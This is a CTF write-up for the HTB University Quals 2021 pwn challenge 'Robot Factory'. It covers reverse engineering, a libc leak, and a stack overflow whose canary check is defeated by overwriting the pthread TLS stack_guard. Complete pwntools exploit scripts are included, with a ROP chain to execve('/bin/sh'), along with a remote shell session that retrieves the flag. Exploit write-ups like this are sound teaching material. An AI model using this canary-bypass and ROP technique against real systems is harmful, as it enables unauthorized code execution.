Rating: 4.0

# Robot Factory

The description for this challenge is as follows:

*You've been asked to investigate the Build-A-Bot factory, where there's rumours of the robots acting strangely. Can you get them under control?*

The challenge was rated at 2 out of 4 stars, and it was worth 425 points at the end with a total of 16 solves. The downloadables for the challenge included the challenge binary and a libc file. I would say that the main challenges involved were reverse-engineering the binary to find the most straightforward exploitation path, as well as knowing about how pthreads affect canaries.

**TL;DR Solution:** Notice that we can get something like a libc leak with robot type 'n' and operation type 'a', as well as seemingly trigger a canary on robot type 's', operation type 'm' with certain inputs, indicating a stack overflow. Reverse engineer the 's' 'm' scenario to note that our input for string 1 is repeated by our entered size, plus one, and stored on the stack, causing overflows when sufficiently large. Note that when pthread is used, we can overwrite the stack_guard to equal whatever we overwrote the canary with. A carefully crafted ropchain, canary overwrite, and stack guard overwrite can then be used to gain shell access.

This writeup is also available on my GitHub! View it there via this link: https://github.com/knittingirl/CTF-Writeups/tree/main/pwn_challs/HTB_Uni_Quals_21/robot_factory

## Gathering Information

I started by running checksec on the file. The results showed that this is a typical x86-64 binary, with a canary, no PIE, and NX.

knittingirl@piglet:~/CTF/HTB_Uni_Quals_21/pwn_robot_factory$checksec robot_factory [*] '/home/knittingirl/CTF/HTB_Uni_Quals_21/pwn_robot_factory/robot_factory' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000)  A quick glance at the decompilation in Ghidra raised concerns that this would be another heap pwn problem due to the presence of malloc and free calls. However, I also noted the use of pthread; the only time that I had previously seen pthread in a pwn challenge, it was used in order to bypass a canary in a manner I will explain in more detail later on. This would indicate a ROP-based approach, which I find significantly simpler.  void main(void) { pthread_t local_10; setvbuf(stdout,(char *)0x0,2,0); puts("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-="); puts("| |"); puts("| WELCOME TO THE ROBOT FACTORY! |"); puts("| DAYS WITHOUT AN ACCIDENT: |"); puts("| 0 |"); puts("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-="); /* This is taking place in a pthread. I know that this can mess with canaries. */ pthread_create(&local_10,(pthread_attr_t *)0x0,self_destruct_protocol,(void *)0x0); do { /* this will get called repeatedly */ create_robot(); } while( true ); }  ### Sort of a Libc Leak Since the decompilation wasn't super clear, I opted to run the binary and try out some of the possible inputs to see if I noticed anything suspicious. Anything involving the 'n' kind of robot seemed to be printing out a large decimal number that seemed like it could translate to some sort of leak; in the example reproduced below, the number in hex is 0x7fb872d9cec8, which looks like a libc value.  knittingirl@piglet:~/CTF/HTB_Uni_Quals_21/pwn_robot_factory$ ./robot_factory
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
| |
| WELCOME TO THE ROBOT FACTORY! |
| DAYS WITHOUT AN ACCIDENT: |
| 0 |
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
What kind of robot would you like? (n/s) > n
What kind of operation do you want? (a/s/m) > a
Enter number 1: 2
Enter number 2: 2
What kind of robot would you like? (n/s) > Result: 140430177586888

To test this theory out, I made a pwntools script with gdb attached that would produce those same inputs and, for convenience, auto-convert the "leak" to a hex address. Here is that script:

from pwn import *

pid = gdb.attach(target, "b *create_robot+145\n set disassembly-flavor intel\ncontinue")

libc = ELF('libc.so.6')
elf = ELF('robot_factory')

#target = remote('64.227.40.93', 31059)

print(target.recvuntil(b'>'))
target.sendline(b'n')

print(target.recvuntil(b'>'))
target.sendline(b'a')

print(target.recvuntil(b'1:'))
target.sendline(b'2')

print(target.recvuntil(b'2:'))
target.sendline(b'2')

print(target.recvuntil(b'Result: '))

result = target.recvuntil(b'\n').strip()
print(result)

leak = int(result)
print('that number is at an address of', hex(leak))
target.interactive()

The relevant sub-section of results:

b' What kind of operation do you want? (a/s/m) >'
b' Enter number 1:'
b' Enter number 2:'
b' What kind of robot would you like? (n/s) > Result: '
b'140635357441736'
that number is at an address of 0x7fe83885eec8


Now, if I use vmmap in gdb, my leak is from an unidentified read-write section, but it does appear to a constant distance from the main libc section:

0x00007fe838060000 0x00007fe838860000 0x0000000000000000 rw-

To check, I found the libc address of system on that particular run, and found that the difference between that address and my leak is 0x8a1548. When I reproduced this between runs, the offset remained consistent, giving me what effectively works as a libc leak that I can use to find the base address on each run.

gef➤ x/gx system
0x7fe839100410 <system>: 0x74ff8548fa1e0ff3


### Getting a Stack Overflow

When I started trying inputs with a robot kind of "s" and an operation kind of "m", I discovered something very interesting, namely that certain inputs could produce the "stack smashing detected" error that means you overwrote a canary.

knittingirl@piglet:~/CTF/HTB_Uni_Quals_21/pwn_robot_factory$./robot_factory =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= | | | WELCOME TO THE ROBOT FACTORY! | | DAYS WITHOUT AN ACCIDENT: | | 0 | =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= What kind of robot would you like? (n/s) > s What kind of operation do you want? (a/s/m) > m Enter string 1: aaaaaaaaaaaaaaaa Enter size: 67 What kind of robot would you like? (n/s) > *** stack smashing detected ***: terminated Aborted  Since this strongly suggests a stack overflow, I investigated further. If we look back at ghidra, the main meat of the program is occurring in a create_robot function. Regardless of the choices I make, it does another pthread with the function do_robot and argument robots[current_index].  pthread_create(&local_28,(pthread_attr_t *)0x0,do_robot,(void *)robots[current_index]); *(pthread_t *)robots[current_index] = local_28;  After some dynamic and static analysis, I discovered that the 's' 'm' combination leads into do_string(), then multiply_func(). While I never fully reverse engineered what was going on, by placing breakpoints and stepping through the function, I was able to work out what was going on. As an aside, I've found that this works most reliably when you set up a breakpoint within create-thread where the first function actually gets called, specifically here with this libc: b *start_thread+213. Anyway, at the end of do_string, I can see that I've overwritten the canary with a's, and will trigger the stack smashing detection:  0x4017fb <do_string+117> mov rax, QWORD PTR [rbp-0x8] → 0x4017ff <do_string+121> sub rax, QWORD PTR fs:0x28 0x401808 <do_string+130> je 0x40180f <do_string+137> 0x40180a <do_string+132> call 0x401070 <__stack_chk_fail@plt> 0x40180f <do_string+137> leave 0x401810 <do_string+138> ret 0x401811 <do_num+0> push rbp ─────────────────────────────────────────────────────────────────── threads ──── [#0] Id 1, Name: "robot_factory", stopped 0x7f82c145c17c in read (), reason: BREAKPOINT [#1] Id 2, Name: "robot_factory", stopped 0x7f82c142b3bf in clock_nanosleep (), reason: BREAKPOINT [#2] Id 4, Name: "robot_factory", stopped 0x4017ff in do_string (), reason: BREAKPOINT ───────────────────────────────────────────────────────────────────── trace ──── [#0] 0x4017ff → do_string() ──────────────────────────────────────────────────────────────────────────────── gef➤ x/gx$rbp-0x8
0x7f82bbffeec8: 0x6161616161616161
gef➤ x/s $rbp-0x8 0x7f82bbffeec8: 'a' <repeats 824 times>  In addition, if I go ahead an find the beginning of my long string of a's, I see that it is 1088 characters long. I input a string of 16 a's for string 1, and 67 for size, and 1088 = 16 * 68, or string 1 length * (size + 1).  ➤ x/s$rbp-0x110
0x7f82bbffedc0: 'a' <repeats 1088 times>

### Why the Canary is No Big Deal

Fortunately, the canary should not be a significant problem. When a function is called within a pthread, the Thread Local Storage (TLS) is stored near the stack and can be overwritten with a sufficiently large overflow. The canary is compared with the stack_guard value within the TLS, so if I ensure that the canary and the stack guard are overwritten with the same value, I will not trigger the smashing detection and can then create a nice ROP chain.

If I look at the decompilation of create_robot, I can see that I should be able to enter strings of up to 0x100 in length, and of any size supported by long integers. As a result, I should be able to achieve enough length to manage my stack guard overwrite.

printf("Enter string 1: ");
lVar1 = robots[current_index];
alloced_area = malloc(0x100);
*(void **)(lVar1 + 0x10) = alloced_area;
fgets(*(char **)(robots[current_index] + 0x10),0x100,stdin);
...
printf("Enter size: ");
/* ooh, stack smashing detected */
__isoc99_scanf("%ld",robots[current_index] + 0x18);
getchar();

I can illustrate this by increasing the size of the overwrite; in this example, I'm using a string 1 of 0x30 a's, and a size of 67.The canary still gets overwritten with a's:

gef➤ x/gx $rbp-0x8 0x7f8da9d20ec8: 0x6161616161616161  But the comparison works, and I instead error out because I've overwritten rsp with a's! All I have to do now is finesse my offsets to allow for a successful ROP.  → 0x401808 <do_string+130> je 0x40180f <do_string+137> TAKEN [Reason: Z] ↳ 0x40180f <do_string+137> leave 0x401810 <do_string+138> ret  As an aside, I found that exessively large payloads would cause issues with line multiply_func+124, on which a memcpy is performed. It seemed to be messing with the value in rdx and causing an error; I did not look into it further, but you need to take care when selecting a size. ## Writing the Exploit I ended up doing a lot of the offset calculations via trial error; this was necessary since I had to consider repeats in my input string. I found that string 1 of 0xe0 a's and size of 10 would bypass the canary without causing further errors. I also experimented with adding varying amounts of non-a characters to the beginning and end, while maintaining an overall length of 0xe0, and determined that payloads like that shown below work:  payload = b'c' * 0x28 + b'a' * 8 + b'e' * 0x78 + b'a' * 8 + b'b' * 0x30  Both the canary and stackguard get set to 0x6161616161616161. I can then swap out the e's for a ropchain that starts with 8 bytes of padding, which gives me plenty of space to do whatever I like. Using the libc base I was able to derive earlier, I got a successful local solve like so:  binsh = libc_base + next(libc.search(b'/bin/sh\x00')) pop_rdi = p64(0x0000000000401ad3) # : pop rdi ; ret pop_rsi = p64(libc_base + 0x0000000000027529) # : pop rsi ; ret pop_rdx_r12 = p64(libc_base + 0x000000000011c371) # : pop rdx ; pop r12 ; ret execve = libc_base + libc.symbols['execve'] ropchain = b'e' * 8 + pop_rdi + p64(binsh) + pop_rsi + p64(0) + pop_rdx_r12 + p64(0) * 2 + p64(execve) ropchain += b'f' * (0x78 - len(ropchain)) payload = b'c' * 0x28 + b'a' * 8 + ropchain + b'a' * 8 + b'b' * 0x30 target.sendline(payload) print(target.recvuntil(b'size:')) target.sendline(b'10') target.interactive()  I discovered that this did not work remotely because my libc base seemed to be off. As a result, I created an alternative ropchain to leak the libc address for puts and compare it against the leak. Fortunately, I got a slightly different, but still consistent offset against the remote host. For reference, the offset between my leak and the libc address of puts turned out to be 0x8af6d8.  ropchain = b'e' * 8 + pop_rdi + p64(puts_got) + p64(puts_plt) ropchain += b'f' * (0x78 - len(ropchain)) payload = b'c' * 0x28 + b'a' * 8 + ropchain + b'a' * 8 + b'b' * 0x30 print('This needs to be 0xe0', hex(len(payload))) target.sendline(payload) print(target.recvuntil(b'size:')) target.sendline(b'10') print(target.recvuntil(b'(n/s) > ')) new_leak = target.recv(6) print(new_leak) puts_libc = u64(new_leak + b'\x00' * 2) print(hex(puts_libc)) print('as a reminder, the leak is at', hex(leak)) print('to get puts_libc, I need to add', hex(puts_libc - leak), 'to my leak') target.interactive()  Here is the final script:  from pwn import * #target = process('./robot_factory', env={"LD_PRELOAD":"./libc.so.6"}) #pid = gdb.attach(target, "b *create_robot+145\nb *do_string+138\nb *multiply_func+124\nb *do_robot\nb *start_thread+213\n set disassembly-flavor intel\ncontinue") libc = ELF('libc.so.6') elf = ELF('robot_factory') target = remote('64.227.38.214', 30031) #Getting libc leak: print(target.recvuntil(b'>')) target.sendline(b'n') print(target.recvuntil(b'>')) target.sendline(b'a') print(target.recvuntil(b'1:')) target.sendline(b'2') print(target.recvuntil(b'2:')) target.sendline(b'2') print(target.recvuntil(b'Result: ')) result = target.recvuntil(b'\n').strip() print(result) leak = int(result) puts_libc = leak + 0x8af6d8 libc_base = puts_libc - libc.symbols['puts'] #print(target.recvuntil(b'>')) target.sendline(b's') print(target.recvuntil(b'>')) target.sendline(b'm') print(target.recvuntil(b'1:')) binsh = libc_base + next(libc.search(b'/bin/sh\x00')) pop_rdi = p64(0x0000000000401ad3) # : pop rdi ; ret pop_rsi = p64(libc_base + 0x0000000000027529) # : pop rsi ; ret pop_rdx_r12 = p64(libc_base + 0x000000000011c371) # : pop rdx ; pop r12 ; ret execve = libc_base + libc.symbols['execve'] printf_libc = libc_base + libc.symbols['printf'] puts_libc = libc_base + libc.symbols['puts'] puts_plt = elf.symbols['puts'] puts_got = elf.got['puts'] #My libcs are off, but the ROPchain basically works ropchain = b'e' * 8 + pop_rdi + p64(binsh) + pop_rsi + p64(0) + pop_rdx_r12 + p64(0) * 2 + p64(execve) #I used this alternate ropchain: #ropchain = b'e' * 8 + pop_rdi + p64(puts_got) + p64(puts_plt) ropchain += b'f' * (0x78 - len(ropchain)) payload = b'c' * 0x28 + b'a' * 8 + ropchain + b'a' * 8 + b'b' * 0x30 print('This needs to be 0xe0', hex(len(payload))) target.sendline(payload) print(target.recvuntil(b'size:')) target.sendline(b'10') #target.interactive() #And this stuff down here to get the remote offset for my libc leak. This way I didn't have to deal with looping back to main. ''' print(target.recvuntil(b'(n/s) > ')) new_leak = target.recv(6) print(new_leak) puts_libc = u64(new_leak + b'\x00' * 2) print(hex(puts_libc)) print('as a reminder, the leak is at', hex(leak)) print('to get puts_libc, I need to add', hex(puts_libc - leak), 'to my leak') ''' target.interactive()  And here are the results when I run it:  knittingirl@piglet:~/CTF/HTB_Uni_Quals_21/pwn_robot_factory$ python3 robot_factory_writeup.py
[*] '/home/knittingirl/CTF/HTB_Uni_Quals_21/pwn_robot_factory/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] '/home/knittingirl/CTF/HTB_Uni_Quals_21/pwn_robot_factory/robot_factory'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Opening connection to 64.227.38.214 on port 30031: Done
b'=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n| |\n| WELCOME TO THE ROBOT FACTORY! |\n| DAYS WITHOUT AN ACCIDENT: |\n| 0 |\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\nWhat kind of robot would you like? (n/s) >'
b' What kind of operation do you want? (a/s/m) >'
b' Enter number 1:'
b' Enter number 2:'
b' What kind of robot would you like? (n/s) > Result: '
b'140352903917256'
b'\x00What kind of operation do you want? (a/s/m) >'
b' Enter string 1:'
This needs to be 0xe0 0xe0
b' Enter size:'
[*] Switching to interactive mode
What kind of robot would you like? (n/s) > $ls bin boot dev etc flag.txt home lib lib32 lib64 libx32 media mnt opt proc root run sbin srv sys tmp usr var$ cat flag.txt
HTB{th3_r0b0t5_4r3_0utt4_c0ntr0l!}
\$